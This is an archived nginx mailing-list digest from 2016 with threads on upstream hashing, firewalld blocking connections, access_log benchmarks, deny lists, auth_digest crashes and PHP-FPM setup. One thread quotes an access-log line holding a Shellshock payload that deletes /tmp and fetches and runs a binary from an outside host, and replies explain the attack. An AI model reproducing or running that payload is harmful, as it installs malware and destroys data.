backend3 > } > - We will kindly remember this is a conceptual example and not how Nginx > does things under the hood (but this is clear enough) > > Let's say that the whole upstream definition creates an array of servers, > so in your first example you'd have an array of: > > upstreams = { "backend1", "backend2", "backend3" } > > The key "127.0.0.1" is run through a mathematical hash function to create > an integer, and it will create the same integer every single time its run. > For our example, let's say that hash("127.0.0.1") equals the number 438653. > In order to select which backend to use, we compute our hash value 438652, > modulo the number of backends we have in our upstream (is essentially the > remainder after division). So, > > 438653 % 3 = 2 > > So we get index 2 from our array. Remember that our conceptual array is > zero-indexed, so we select upstreams[2], or the third element in our array, > which is "backend3". Every time a backend is selected for the key > "127.0.0.1", "backend3" will be used. because that's the result of looking > up upstreams[2]. Now, let's change the upstream block to such: > > upstream backend { > backend2 > backend3 > backend1 > } > > Assuming nothing else has changed, we run through the same process again. > hash("127.0.0.1") is 438653, and 438653 % 3 is still 2. So, we look up > upstreams[2] (the third element in our array, same as last time), and we > get "backend1". Given this upstream configuration, we will get the same > result every time. In this example, the order we define backends matters, > and this can be used to explain your results perfectly. You shouldn't > expect that your key will be hashed to the first backend in your upstream > block, you should only expect that the same key will produce the same > _relative_ result every time it is hashed. > > (And again to note, Nginx does do things slightly differently, rr peers > are defined as a linked list, not an array, and lookup is not strictly > hashval % list length; this is a conceptual example _only_) > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From larry.martell at gmail.com Thu Jul 28 19:01:17 2016 From: larry.martell at gmail.com (Larry Martell) Date: Thu, 28 Jul 2016 15:01:17 -0400 Subject: listening but not connecting Message-ID: Trying to set up nginx and uwsgi for django. Following the directions here: https://www.digitalocean.com/community/tutorials/how-to-serve-django-applications-with-uwsgi-and-nginx-on-centos-7 netstat shows that nginx is listening on port 80: tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 9256/nginx: master But I cannot connect from my browser (I get connection timeout): This is my nginx.conf file: worker_processes 1; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; keepalive_timeout 65; sendfile on; client_max_body_size 20M; include /etc/nginx/sites-enabled/*; } In /etc/nginx/sites-enabled I have this one file: # motor_nginx.conf # the upstream component nginx needs to connect to upstream django { server unix:///usr/local/motor/motor.sock; # for a file socket } # configuration of the server server { # the port your site will be served on listen 80; # the domain name it will serve for server_name localhost; charset utf-8; # max upload size client_max_body_size 75M; # adjust to taste # Django media location /media { alias /usr/local/motor/motor/media; } location /static { alias /usr/local/motor/motor/static; } # Finally, send all non-media requests to the Django server. location / { uwsgi_pass django; include /usr/local/motor/motor/uwsgi_params; } } The error log has just this one line: 2016/07/28 14:26:41 [notice] 8737#0: signal process started And there is nothing in the access.log. Any ideas what I could be missing or what i should check? From pratyush at hostindya.com Thu Jul 28 19:43:18 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Fri, 29 Jul 2016 01:13:18 +0530 Subject: listening but not connecting In-Reply-To: Message-ID: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> An HTML attachment was scrubbed... URL: From larry.martell at gmail.com Thu Jul 28 19:49:15 2016 From: larry.martell at gmail.com (Larry Martell) Date: Thu, 28 Jul 2016 15:49:15 -0400 Subject: listening but not connecting In-Reply-To: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> References: <176655ed-8302-436c-9d7c-e9f1cbab77e7@email.android.com> Message-ID: On Thursday, July 28, 2016, Pratyush Kumar wrote: > Can you please share the address which you are using in browser. > > According to the config which you shared, you will get a response only if > you use localhost as URL in browser > I am connecting from the outside to the public IP of the machine. What should I put in the config? It's listening on 0.0.0.0 so I thought that would work for any address. -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Thu Jul 28 19:52:40 2016 From: francis at daoine.org (Francis Daly) Date: Thu, 28 Jul 2016 20:52:40 +0100 Subject: listening but not connecting In-Reply-To: References: Message-ID: <20160728195240.GC12280@daoine.org> On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote: Hi there, > netstat shows that nginx is listening on port 80: > > tcp 0 0 0.0.0.0:80 0.0.0.0:* > LISTEN 9256/nginx: master > > But I cannot connect from my browser (I get connection timeout): > The error log has just this one line: > > 2016/07/28 14:26:41 [notice] 8737#0: signal process started > > And there is nothing in the access.log. > > Any ideas what I could be missing or what i should check? nginx is seeing no traffic. So look at everything outside of nginx. Does the hostname you use resolve to the nginx IP address? Do you have a working network route to and from the nginx server? Is the a firewall or network control device anywhere in between that is dropping the traffic? >From the nginx server, does "curl -v http://127.0.0.1/" or "curl -v http://127.0.0.1/static/" give any useful response, or output in the log files? If so, you know that nginx is active. Does "tcpdump" on the nginx server show any incoming port-80 traffic? Good luck with it, f -- Francis Daly francis at daoine.org From r at roze.lv Thu Jul 28 20:01:54 2016 From: r at roze.lv (Reinis Rozitis) Date: Thu, 28 Jul 2016 23:01:54 +0300 Subject: listening but not connecting In-Reply-To: References: Message-ID: > But I cannot connect from my browser (I get connection timeout): Is there a firewall on the server (if yes - is the port 80 open?). rr From nginx-forum at forum.nginx.org Thu Jul 28 20:19:24 2016 From: nginx-forum at forum.nginx.org (stevewin) Date: Thu, 28 Jul 2016 16:19:24 -0400 Subject: Access_log off impact on Requests/sec In-Reply-To: <20160728152135.GU57459@mdounin.ru> References: <20160728152135.GU57459@mdounin.ru> Message-ID: <56719e912bfe2cd8a85e149b19067e9b.NginxMailingListEnglish@forum.nginx.org> Thanks Maxim. Setting either 'accept_mutex pff;' or reuseport on the listen directive doesn't seem to change the general trend much (apologies for formatting below but can't seem to find a way to paste data elegantly in this forum) In data below the Columns are as follows "Wrk_threads" "Connections" "Default config" "access_log off';" "access_log off; + accept_mutex off;" "access_log off; + listen...reuseport" Requests/sec: 8 8 19352.37 22290.17 23944.48 23448.55 16 16 24839.12 28408.74 26976.59 27545.21 16 24 24845.17 28479.84 27039.90 27631.32 16 32 24633.34 25373.32 22097.93 25792.31 16 48 24540.14 21701.73 19953.71 23836.73 16 72 24620.15 19669.01 19285.64 20222.72 16 96 24591.50 19616.52 19646.13 19669.74 16 120 24569.45 19815.90 19752.29 19818.98 16 200 24642.54 20001.03 19981.29 19974.83 16 300 24161.27 20185.21 20376.75 20381.96 16 400 24607.07 20526.47 20743.34 20459.76 16 500 24712.25 20626.14 21016.65 20927.98 16 1000 24597.04 21137.30 21377.55 21032.03 Average Latency: 8 8 0.87ms 774.84us 348.81us 580.52us 16 16 1.61ms 1.31ms 679.01us 2.14ms 16 24 1.25ms 1.06ms 642.36us 1.52ms 16 32 3.94ms 3.23ms 1.93ms 10.26ms 16 48 8.71ms 5.00ms 3.25ms 26.24ms 16 72 17.21ms 5.37ms 3.95ms 7.53ms 16 96 36.09ms 9.79ms 8.49ms 8.05ms 16 120 44.31ms 12.13ms 9.82ms 9.82ms 16 200 108.02ms 22.18ms 21.58ms 19.26ms 16 300 112.68ms 36.75ms 39.94ms 35.11ms 16 400 94.84ms 58.44ms 60.78ms 53.03ms 16 500 82.97ms 78.26ms 65.91ms 71.37ms 16 1000 50.99ms 164.28ms 156.12ms 165.86ms Socket errors: 8 8 none none none none 16 16 none none none none 16 24 none none none none 16 32 none none none none 16 48 none none none none 16 72 none none none none 16 96 none none none none 16 120 none none none none 16 200 none none none none 16 300 timeout 35 none none none 16 400 read 14, timeout 44 none none none 16 500 read 37, timeout 111 none none timeout 57 16 1000 timeout 189 timeout 473 timeout 629 timeout 1162 I had been experimenting with various tuning parameters for both NGINX and Linux including NGINX worker_connections, access_log, worker_rlimit_nofile, multi_accept, keepalive_requests Linux somaxconn, tcp_max_tw_buckets, netdev_max_backlog, tcp_max_syn_backlog, ip_local_port_range, tcp_fin_timeout, tcp_tw_recycle, tcp_tw_reuse, wmem_max, tcp_rmem, tcp_wmem When I was getting undesired results with 'optimiizations' - I started backing off the various tunings above - for some reason the access log off seems to be the main perpetrator - for reasons I don't understand On the client side I'm running on a machine with Intel(R) Xeon(R) CPU E3-1241 v3 @ 3.50GHz (4 core/ 8 thread). I've repeated the runs with both 8 and 32 wrk threads with similar trend using access_log off; Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268622#msg-268622 From nginx-forum at forum.nginx.org Thu Jul 28 20:22:28 2016 From: nginx-forum at forum.nginx.org (stevewin) Date: Thu, 28 Jul 2016 16:22:28 -0400 Subject: Access_log off impact on Requests/sec In-Reply-To: <146C468554894261B4FF293B9C93034D@MezhRoze> References: <146C468554894261B4FF293B9C93034D@MezhRoze> Message-ID: Thanks Reinis. The system is ARM-based server development platform. The chip is essentially a Pass 1 prototype (with known limitations) - not a production part Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268609,268623#msg-268623 From larry.martell at gmail.com Fri Jul 29 02:13:30 2016 From: larry.martell at gmail.com (Larry Martell) Date: Thu, 28 Jul 2016 22:13:30 -0400 Subject: listening but not connecting In-Reply-To: <20160728195240.GC12280@daoine.org> References: <20160728195240.GC12280@daoine.org> Message-ID: On Thu, Jul 28, 2016 at 3:52 PM, Francis Daly wrote: > On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote: > > Hi there, > >> netstat shows that nginx is listening on port 80: >> >> tcp 0 0 0.0.0.0:80 0.0.0.0:* >> LISTEN 9256/nginx: master >> >> But I cannot connect from my browser (I get connection timeout): > >> The error log has just this one line: >> >> 2016/07/28 14:26:41 [notice] 8737#0: signal process started >> >> And there is nothing in the access.log. >> >> Any ideas what I could be missing or what i should check? > > nginx is seeing no traffic. > > So look at everything outside of nginx. > > Does the hostname you use resolve to the nginx IP address? >From my browser I am connecting to it with an IP address. > Do you have a working network route to and from the nginx server? Yes, I can ping it from the host I am trying to connect from . > Is the a firewall or network control device anywhere in between that is dropping the traffic? There was the out of the box firewall, and first I made sure port 80 was open (firewall-cmd --zone=public --add-port=80/tcp --permanent) and then I totally disabled the firewalll (systemctl disable firewalld). I also disabled selinux. > From the nginx server, does "curl -v http://127.0.0.1/" That returns the django login page, which is what I would expect. > or "curl -v http://127.0.0.1/static/" That gives a 403 forbidden. > give any useful response, or output in the log files? For that request nginx error log has: [error] 9257#0: *21 directory index of "/usr/local/motor/motor/static/" is forbidden, client: 127.0.0.1, server: localhost, request: "GET /static/ HTTP/1.1", host: "127.0.0.1" > If so, you know that nginx is active. > > Does "tcpdump" on the nginx server show any incoming port-80 traffic? I am trying to connect from 173 and the nginx host is 152. When I try and connect from the browser tcpdump shows messages like this: IP xx.xx.xx.173.58265 > xx.xx.xx.152.http: Flags [S], seq 2911544323, win 5840, options [mss 1460,sackOK,TS val 442582882 ecr 0,nop,wscale 2,unknown-76 0x01019887a79a0005,unknown-76 0x0c05,nop,eol], length 0 IP xx.xx.xx.152 > xx.xx.xx.173: ICMP host 10.188.36.152 unreachable - admin prohibited, length 84 > Good luck with it, Thanks. I need more then luck ;-) From francis at daoine.org Fri Jul 29 07:58:11 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 29 Jul 2016 08:58:11 +0100 Subject: listening but not connecting In-Reply-To: References: <20160728195240.GC12280@daoine.org> Message-ID: <20160729075811.GD12280@daoine.org> On Thu, Jul 28, 2016 at 10:13:30PM -0400, Larry Martell wrote: > On Thu, Jul 28, 2016 at 3:52 PM, Francis Daly wrote: > > On Thu, Jul 28, 2016 at 03:01:17PM -0400, Larry Martell wrote: Hi there, > > From the nginx server, does "curl -v http://127.0.0.1/" > > That returns the django login page, which is what I would expect. That much is all good. > For that request nginx error log has: > > [error] 9257#0: *21 directory index of > "/usr/local/motor/motor/static/" is forbidden, client: 127.0.0.1, > server: localhost, request: "GET /static/ HTTP/1.1", host: "127.0.0.1" That's also good. > > Does "tcpdump" on the nginx server show any incoming port-80 traffic? > > I am trying to connect from 173 and the nginx host is 152. When I try > and connect from the browser tcpdump shows messages like this: > > IP xx.xx.xx.173.58265 > xx.xx.xx.152.http: Flags [S], seq 2911544323, > win 5840, options [mss 1460,sackOK,TS val 442582882 ecr 0,nop,wscale > 2,unknown-76 0x01019887a79a0005,unknown-76 0x0c05,nop,eol], length 0 > IP xx.xx.xx.152 > xx.xx.xx.173: ICMP host 10.188.36.152 unreachable - > admin prohibited, length 84 That says that the incoming traffic does get to xx.xx.xx.152, but that machine says says that 10.188.36.152 is not accessible. Assuming that those two .152 numbers are your nginx server, something on it (that is not nginx) is blocking the traffic. Does "iptables -L -v -n" show anything interesting? You said that you disabled the firewall, so it probably is empty. Is there more than one network interface on the nginx server, and do you have reverse-path filtering (rp_filter) enabled on this interface? I think that that can lead to the same signs. Otherwise, you get to learn more about the security aspects of your operating system :-( Cheers, f -- Francis Daly francis at daoine.org From larry.martell at gmail.com Fri Jul 29 11:18:12 2016 From: larry.martell at gmail.com (Larry Martell) Date: Fri, 29 Jul 2016 07:18:12 -0400 Subject: listening but not connecting In-Reply-To: <20160729075811.GD12280@daoine.org> References: <20160728195240.GC12280@daoine.org> <20160729075811.GD12280@daoine.org> Message-ID: On Fri, Jul 29, 2016 at 3:58 AM, Francis Daly wrote: > On Thu, Jul 28, 2016 at 10:13:30PM -0400, Larry Martell wrote: > Does "iptables -L -v -n" show anything interesting? You said that you > disabled the firewall, so it probably is empty. I am on Centos7 which uses firewalld, not iptables. I had disabled it with "systemctl disable firewalld" but apparently that does not actually disable it. I did "systemctl stop firewalld" and then everything started to work. Thank you very much for all your help. From nginx-forum at forum.nginx.org Fri Jul 29 15:42:11 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Fri, 29 Jul 2016 11:42:11 -0400 Subject: Would nginx use multi block device instead of file system Message-ID: use block device directly like ats and squid, and build request offset hash table, should be more effectively? Would nginx support this? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268627,268627#msg-268627 From nginx-forum at forum.nginx.org Fri Jul 29 18:55:11 2016 From: nginx-forum at forum.nginx.org (aamte) Date: Fri, 29 Jul 2016 14:55:11 -0400 Subject: Accessing library functions from our own nginx module Message-ID: <0786199394eb2b335d0abc47dbd81f91.NginxMailingListEnglish@forum.nginx.org> Hi, I am currently writing a dynamic nginx http module which is linked to a static C++ library using the following command: CORE_LIBS="$CORE_LIBS /path/to/static/library.a" I just started using nginx and am a beginner and I am stuck at the point where I am unable to call functions present in the library. Can someone please help me and guide me to an appropriate tutorial/ code that I can look at and understand. I have been stuck for past 2 days and any help would be really appreciated. Thanks in advance. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268628,268628#msg-268628 From lists at lazygranch.com Sat Jul 30 06:01:05 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Fri, 29 Jul 2016 23:01:05 -0700 Subject: Hierarchy of malformed requests and blocked IPs Message-ID: <20160730060105.5501012.85163.7747@lazygranch.com> An HTML attachment was scrubbed... URL: From vbart at nginx.com Sat Jul 30 10:18:47 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 30 Jul 2016 13:18:47 +0300 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730060105.5501012.85163.7747@lazygranch.com> References: <20160730060105.5501012.85163.7747@lazygranch.com> Message-ID: <3493118.aR1ooWoyal@vbart-laptop> On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > I see a fair amount of hacking attempts in the access.log. That is, they show up with a return code of 400 (malformed). Well yeah, they are certainly malformed. But when I add the offending IP address to my blocked list, they still show up as malformed upon subsequent readings of access.log. That is, it appears to me that nginx isn't checking the blocked list first. > > If true, shouldn't the blocked IPs take precedence? > > Nginx 1.10.1 on freebsd 10.2 > It's unclear what do you mean by "my blocked list". But if you're speaking about "ngx_http_access_module" then the answer is no, it shouldn't take precedence. It works on a location basis, which implies that the request has been parsed already. wbr, Valentin V. Bartenev From idefix at fechner.net Sat Jul 30 16:03:47 2016 From: idefix at fechner.net (Matthias Fechner) Date: Sat, 30 Jul 2016 18:03:47 +0200 Subject: Auth_digest not working Message-ID: <01c22c88-23f9-d38d-5ce2-0bdcb6c89f3d@fechner.net> Dear all, I have a very simple webserver running with php-fpm connected (to handle php scripts). It is running perfectly fine without authentication (on a FreeBSD installation). If I enable auth_digest (which is enabled in the FreeBSD port I compiled), I see only in the main error log the line: 2016/07/30 17:55:54 [alert] 7280#102036: worker process 7318 exited on signal 11 The configuration is: server { listen 127.0.0.1:8082 proxy_protocol; listen 127.0.0.1:8083 http2 proxy_protocol; add_header Strict-Transport-Security "max-age=15768000; includeSubdomains; preload" always; client_max_body_size 10G; client_body_buffer_size 128k; fastcgi_buffers 64 4K; server_name ; root /usr/home/http//html; access_log /usr/home/http/$host/logs/access.log; error_log /usr/home/http//logs/error.log debug; auth_digest_user_file /usr/home/http/default/htdigest.passwd; auth_digest 'partdb'; location / { try_files $uri $uri/ @partdb; } location @partdb { rewrite ^/(.*) /index.php?id=$1&$args last; } location ~ \.php(?:$|/) { include fastcgi_params; fastcgi_pass php-handler; } } Does anyone have an idea, why auth_digest causes a complete not working virtualhost? Thanks Matthias -- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to produce bigger and better idiots. So far, the universe is winning." -- Rich Cook From lists at lazygranch.com Sat Jul 30 17:52:46 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 10:52:46 -0700 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <3493118.aR1ooWoyal@vbart-laptop> References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> Message-ID: <20160730105246.12c5aad4@linux-h57q.site> On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" wrote: > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return code of 400 (malformed). Well yeah, they are > certainly malformed. But when I add the offending IP address to my > blocked list, they still show up as malformed upon subsequent > readings of access.log. That is, it appears to me that nginx isn't > checking the blocked list first. > > > > If true, shouldn't the blocked IPs take precedence? > > > > Nginx 1.10.1 on freebsd 10.2 > > > > It's unclear what do you mean by "my blocked list". But if you're > speaking about "ngx_http_access_module" then the answer is no, it > shouldn't take precedence. It works on a location basis, which > implies that the request has been parsed already. > > wbr, Valentin V. Bartenev > > _______________________________________________ My "blocked IPs" are implemented as follows. In nginx.conf: ------------------ http { include mime.types; include /usr/local/etc/nginx/blockips.conf; ------------------------------------- Tne format of the blockips.conf file: ------------------ #haliburton deny 34.183.197.69 ; #cloudflare deny 103.21.244.0/22 ; deny 103.22.200.0/22 ; deny 103.31.4.0/22 ; ------------------------------- Running "make config" in the nginx ports, I don't see "ngx_http_access_module" as an option, nor anything similar. So given this set up, should the IP space in blockedips.conf take precedence? My thinking is this. If a certain IP (or more generally the entire IP space of the entity) is known to be attempting hacks, why bother to process the http request? I know I could block them in the firewall, but blocking in the web server makes more sense to me. Here is an example from access.log for a return code of 400: 95.213.177.126 - - [30/Jul/2016:11:35:46 +0000] "CONNECT check.proxyradar.com:80 HTTP/1.1" 400 173 "-" "-" I have the entire IP space of selectel.ru blocked since it is a source of constant hacking. (Uh, no offense to the land of dot ru). From lists at lazygranch.com Sat Jul 30 17:57:44 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 10:57:44 -0700 Subject: Bash script; Was it executed? Message-ID: <20160730105744.3e03a76e@linux-h57q.site> I see a return code of 200. Does that mean this script was executed? ------------- 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm >> >> -rf /tmp/*;echo wget http://houmen .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7 77 /tmp/Run.sh;/tmp/Run.sh\x22" ------------------------- From r1ch+nginx at teamliquid.net Sat Jul 30 19:06:48 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Sat, 30 Jul 2016 21:06:48 +0200 Subject: Bash script; Was it executed? In-Reply-To: <20160730105744.3e03a76e@linux-h57q.site> References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: Not unless your / location passes the request to a vulnerable cgi-script using a vulnerable version of bash. See https://en.wikipedia.org/wiki/Shellshock_(software_bug) On Sat, Jul 30, 2016 at 7:57 PM, lists at lazygranch.com wrote: > I see a return code of 200. Does that mean this script was executed? > ------------- > 219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643 > "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget > http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod > >> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm > >> >> -rf /tmp/*;echo wget http://houmen > .linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma > >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod > >> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma > >> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7 > 77 /tmp/Run.sh;/tmp/Run.sh\x22" > ------------------------- > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Sat Jul 30 19:09:27 2016 From: r at roze.lv (Reinis Rozitis) Date: Sat, 30 Jul 2016 22:09:27 +0300 Subject: Bash script; Was it executed? In-Reply-To: <20160730105744.3e03a76e@linux-h57q.site> References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: > I see a return code of 200. Does that mean this script was executed? The return code is for GET request on /. Unless you have an index page that "executes" (typically cgi) referer or browser useragent. It seems as an bash vulnerabilty (known as shellshock CVE-2014-6271) attempt. rr From lists at lazygranch.com Sat Jul 30 19:32:44 2016 From: lists at lazygranch.com (lists at lazygranch.com) Date: Sat, 30 Jul 2016 12:32:44 -0700 Subject: Bash script; Was it executed? In-Reply-To: References: <20160730105744.3e03a76e@linux-h57q.site> Message-ID: <20160730193244.5484625.75544.7777@lazygranch.com> Thanks. I am patched for shellshock. The 200 return code through me off. ? Original Message ? From: Reinis Rozitis Sent: Saturday, July 30, 2016 12:21 PM To: nginx at nginx.org Reply To: nginx at nginx.org Subject: Re: Bash script; Was it executed? > I see a return code of 200. Does that mean this script was executed? The return code is for GET request on /. Unless you have an index page that "executes" (typically cgi) referer or browser useragent. It seems as an bash vulnerabilty (known as shellshock CVE-2014-6271) attempt. rr _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Sat Jul 30 20:30:08 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Sat, 30 Jul 2016 16:30:08 -0400 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730105246.12c5aad4@linux-h57q.site> References: <20160730105246.12c5aad4@linux-h57q.site> Message-ID: <2c367a9b83b92d60dfc579bec75dc6cb.NginxMailingListEnglish@forum.nginx.org> A 400 doesn't reach location blocks. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268638#msg-268638 From mailinglisten at simonhoenscheid.de Sat Jul 30 20:44:55 2016 From: mailinglisten at simonhoenscheid.de (=?UTF-8?Q?Simon_H=c3=b6nscheid?=) Date: Sat, 30 Jul 2016 22:44:55 +0200 Subject: PHP-FPM Integration driving me mad Message-ID: <42b563a8-b7ce-88c0-6d26-24f328fd17e5@simonhoenscheid.de> Hello List, due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found. ==> /var/log/nginx/www.example.com-error.log <== 2016/07/30 21:21:15 [error] 5546#5546: *1 FastCGI sent in stderr: "Primary script unknown" while reading response header from upstream, client: xx.xxx.xxx.xxx, server: www.example.com, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://unix:/var/run/fpmpool-www.socket:", host: "www.example.com" Do I leave it out, the script is handled but no output is retuned.(blank white page) I'm debugging this now for hours and dont get any usable result. Any help is appreciated. Nginx: 1.10.1 PHP: 5.6.24 OS: Debian 8.5 nginx conf: user www-data; worker_processes 4; pid /var/run/nginx.pid; worker_rlimit_nofile 40960; events { use epoll; worker_connections 4096; } http { proxy_intercept_errors on; fastcgi_intercept_errors on; log_format main ''; tcp_nopush on; tcp_nodelay on; keepalive_timeout 5; sendfile on; keepalive_requests 150; include /etc/nginx/sites-enabled/*; include /etc/nginx/mime.types; open_file_cache max=40960 inactive=20s; open_file_cache_valid 30s; open_file_cache_min_uses 2; open_file_cache_errors on; gzip on; gzip_min_length 10240; gzip_proxied expired no-cache no-store private auth; gzip_types text/plain text/css text/xml application/xml text/javascript application/x-javascript; gzip_disable "MSIE [1-6]\."; proxy_buffers 64 32k; } the server itself: server { server_name www.example.com; listen xxx.xxx.xxx.xx:443 ssl http2; access_log /var/log/nginx/www.example.com-access.log combined; error_log /var/log/nginx/www.example.com-error.log notice; ssl_protocols TLSv1.2 TLSv1.1 TLSv1; ssl_ciphers EECDH+AESGCM:EDH+AESGCM:EECDH:EDH:MD5:!RC4:!LOW:!MEDIUM:!CAMELLIA:!ECDSA:!DES:!DSS:!3DES:!NULL; charset utf-8; index index.php index.html; client_max_body_size 50M; ssl_prefer_server_ciphers on; ssl_session_cache shared:SSL:5m; ssl_dhparam /etc/nginx/dhparam.pem; ssl_certificate /opt/letsencrypt_certificates/nginx/www.example.com/fullchain.pem; ssl_certificate_key /opt/letsencrypt_certificates/nginx/www.example.com/privkey.pem; location ~ /\. { deny all; access_log off; log_not_found off; } location / { try_files $uri $uri/ /index.php?q=$uri&$args; root /var/www/www.example.com; } location ~ \.php$ { fastcgi_buffers 16 4k; fastcgi_index index.php; fastcgi_pass unix:/var/run/fpmpool-www.socket; include fastcgi_params; } } PHP fpm config [global] pid = /var/run/php5-fpm.pid error_log = /var/log/php5-fpm.log syslog.facility = daemon syslog.ident = php-fpm log_level = notice emergency_restart_threshold = 0 emergency_restart_interval = 0 process_control_timeout = 0 include=/etc/php5/fpm/pool.d/*.conf PHP pool config: listen = /var/run/fpmpool-www.socket listen.backlog = -1 listen.owner = www-data listen.group = www-data user = www-data group = www-data pm = dynamic pm.max_children = 25 pm.start_servers = 10 pm.min_spare_servers = 10 pm.max_spare_servers = 20 pm.max_requests = 500 pm.status_path = /fpm-status ping.response = pong request_terminate_timeout = 60s request_slowlog_timeout = 0 slowlog = /var/log/php-fpm/www-slow.log rlimit_files = 32000 rlimit_core = unlimited catch_workers_output = yes old PHP Location, on old server was: location ~* \.php$ { fastcgi_buffers 16 4k; fastcgi_index index.php; fastcgi_pass 127.0.0.1:9000; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param SCRIPT_URI http://$http_host$request_uri; fastcgi_param SCRIPT_URL $request_uri; fastcgi_param SERVER_NAME $http_host; } Kind Regards Simon From vbart at nginx.com Sat Jul 30 20:49:30 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Sat, 30 Jul 2016 23:49:30 +0300 Subject: Hierarchy of malformed requests and blocked IPs In-Reply-To: <20160730105246.12c5aad4@linux-h57q.site> References: <20160730060105.5501012.85163.7747@lazygranch.com> <3493118.aR1ooWoyal@vbart-laptop> <20160730105246.12c5aad4@linux-h57q.site> Message-ID: <6477113.d8pPmRZ3H4@vbart-laptop> On Saturday 30 July 2016 10:52:46 lists at lazygranch.com wrote: > On Sat, 30 Jul 2016 13:18:47 +0300 > "Valentin V. Bartenev" wrote: > > > On Friday 29 July 2016 23:01:05 lists at lazygranch.com wrote: > > > I see a fair amount of hacking attempts in the access.log. That is, > > > they > > show up with a return code of 400 (malformed). Well yeah, they are > > certainly malformed. But when I add the offending IP address to my > > blocked list, they still show up as malformed upon subsequent > > readings of access.log. That is, it appears to me that nginx isn't > > checking the blocked list first. > > > > > > If true, shouldn't the blocked IPs take precedence? > > > > > > Nginx 1.10.1 on freebsd 10.2 > > > > > > > It's unclear what do you mean by "my blocked list". But if you're > > speaking about "ngx_http_access_module" then the answer is no, it > > shouldn't take precedence. It works on a location basis, which > > implies that the request has been parsed already. > > > > wbr, Valentin V. Bartenev > > > > _______________________________________________ > > My "blocked IPs" are implemented as follows. In nginx.conf: > ------------------ > http { > include mime.types; > include /usr/local/etc/nginx/blockips.conf; > ------------------------------------- > > Tne format of the blockips.conf file: > ------------------ > #haliburton > deny 34.183.197.69 ; > #cloudflare > deny 103.21.244.0/22 ; > deny 103.22.200.0/22 ; > deny 103.31.4.0/22 ; > ------------------------------- The "deny" directive comes from ngx_http_access_module. See the documentation: http://nginx.org/en/docs/http/ngx_http_access_module.html > > Running "make config" in the nginx ports, I don't see > "ngx_http_access_module" as an option, nor anything similar. > [..] It's a standard module, which is usually built by default. > So given this set up, 